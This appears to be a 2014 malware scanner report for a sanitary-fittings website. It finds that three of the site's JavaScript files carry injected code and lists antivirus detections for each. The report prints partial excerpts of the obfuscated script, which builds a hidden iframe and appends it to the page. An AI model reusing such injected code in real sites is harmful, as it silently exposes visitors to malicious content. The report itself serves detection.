New scan:

Malware Scanner report for ezzisanitary.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ezzisanitary.com/
200 OK
Content-Length: 13721
Content-Type: text/html
clean
http://ezzisanitary.com/scripts.js
200 OK
Content-Length: 11400
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var
... 8433 bytes are skipped ...
frm.style.visibility='hidden'; var var41=17;if(var41>1540){var var39=[0,18,12,6];var var40=12;var40+=0.016} document.body.appendChild(ifrm);var var43=0.0437;if(var43==0.0087){var var42=0.002}var var44=2082;var44-=0.0189;iframeWasCreated=true;var var45=false}var var48=0.008;if(var48==7526){var var46=8527;var46--;var var47=5186;var47--}for(var var49=0;var49<8;var49++){var var50=false}}catch(e){iframeWasCreated=undefined}var var51=0.0135;var51+=1355;var var52=0.0019;var52++}, 100);

Antivirus reports:

AntiVir
JS/Agent.aow.1
Avast
JS:Iframe-TE [Trj]
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Script.VE
TrendMicro-HouseCall
TROJ_GEN.F47V0214
Emsisoft
JS:Trojan.Script.VE (B)
Comodo
TrojWare.JS.Agent.AU
Kaspersky
HEUR:Trojan.Script.Generic
F-Secure
JS:Trojan.Script.VE
F-Prot
JS/IFrame.RS.gen
Norman
Agent.ALETV
GData
JS:Trojan.Script.VE
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.VE

http://ezzisanitary.com/jquery-latest.pack.js
200 OK
Content-Length: 22430
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var
... 8433 bytes are skipped ...
frm.style.visibility='hidden'; var var41=17;if(var41>1540){var var39=[0,18,12,6];var var40=12;var40+=0.016} document.body.appendChild(ifrm);var var43=0.0437;if(var43==0.0087){var var42=0.002}var var44=2082;var44-=0.0189;iframeWasCreated=true;var var45=false}var var48=0.008;if(var48==7526){var var46=8527;var46--;var var47=5186;var47--}for(var var49=0;var49<8;var49++){var var50=false}}catch(e){iframeWasCreated=undefined}var var51=0.0135;var51+=1355;var var52=0.0019;var52++}, 100);

Antivirus reports:

AntiVir
JS/Agent.aow.1
Avast
JS:Iframe-TE [Trj]
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Script.VE
TrendMicro-HouseCall
TROJ_GEN.F47V0214
Emsisoft
JS:Trojan.Script.VE (B)
Comodo
TrojWare.JS.Agent.AU
Kaspersky
HEUR:Trojan.Script.Generic
F-Secure
JS:Trojan.Script.VE
F-Prot
JS/IFrame.RS.gen
Norman
Agent.ALETV
GData
JS:Trojan.Script.VE
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.VE

http://ezzisanitary.com/thickbox-compressed.js
200 OK
Content-Length: 15304
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function dow(hit){var var1=0.0086;var1+=18;return hit}var var2=0.0165;var2+=16;function gel(str,shift){var sux,ext,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,thy){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr(3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;function led(pow,nib,xis){var
... 8433 bytes are skipped ...
frm.style.visibility='hidden'; var var41=17;if(var41>1540){var var39=[0,18,12,6];var var40=12;var40+=0.016} document.body.appendChild(ifrm);var var43=0.0437;if(var43==0.0087){var var42=0.002}var var44=2082;var44-=0.0189;iframeWasCreated=true;var var45=false}var var48=0.008;if(var48==7526){var var46=8527;var46--;var var47=5186;var47--}for(var var49=0;var49<8;var49++){var var50=false}}catch(e){iframeWasCreated=undefined}var var51=0.0135;var51+=1355;var var52=0.0019;var52++}, 100);

Antivirus reports:

AntiVir
JS/Agent.aow.1
Avast
JS:Iframe-TE [Trj]
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Script.VE
TrendMicro-HouseCall
TROJ_GEN.F47V0214
Emsisoft
JS:Trojan.Script.VE (B)
Comodo
TrojWare.JS.Agent.AU
Kaspersky
HEUR:Trojan.Script.Generic
F-Secure
JS:Trojan.Script.VE
F-Prot
JS/IFrame.RS.gen
Norman
Agent.ALETV
GData
JS:Trojan.Script.VE
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.VE

http://ezzisanitary.com/inquiry.htm
200 OK
Content-Length: 1090
Content-Type: text/html
clean
http://ezzisanitary.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://ezzisanitary.com/cp-fittings.htm?keepThis=true&TB_iframe=true&height=450&width=484
200 OK
Content-Length: 2243
Content-Type: text/html
clean
http://ezzisanitary.com/products.htm
200 OK
Content-Length: 12008
Content-Type: text/html
clean
http://ezzisanitary.com/ceramics.htm?keepThis=true&TB_iframe=true&height=450&width=484
200 OK
Content-Length: 2220
Content-Type: text/html
clean
http://ezzisanitary.com/bathroom-accessories.htm?keepThis=true&TB_iframe=true&height=450&width=484
200 OK
Content-Length: 2304
Content-Type: text/html
clean
http://ezzisanitary.com/index.htm
200 OK
Content-Length: 13721
Content-Type: text/html
clean
http://ezzisanitary.com/about-us.htm
200 OK
Content-Length: 11952
Content-Type: text/html
clean
http://ezzisanitary.com/contact-us.htm
200 OK
Content-Length: 12184
Content-Type: text/html
clean
http://ezzisanitary.com/map.htm
200 OK
Content-Length: 632
Content-Type: text/html
clean
http://ezzisanitary.com/link-partners.htm
200 OK
Content-Length: 3763
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ezzisanitary.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 16:43:34 GMT
Accept-Ranges: bytes
ETag: "ccc8011-3599-487839def16c0"
Server: Apache
Content-Length: 13721
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 18:41:07 GMT

...13721 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ezzisanitary.com
Referer: http://www.google.com/search?q=ezzisanitary.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ezzisanitary.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ezzisanitary.com/

Result: ezzisanitary.com is not infected or malware details are not published yet.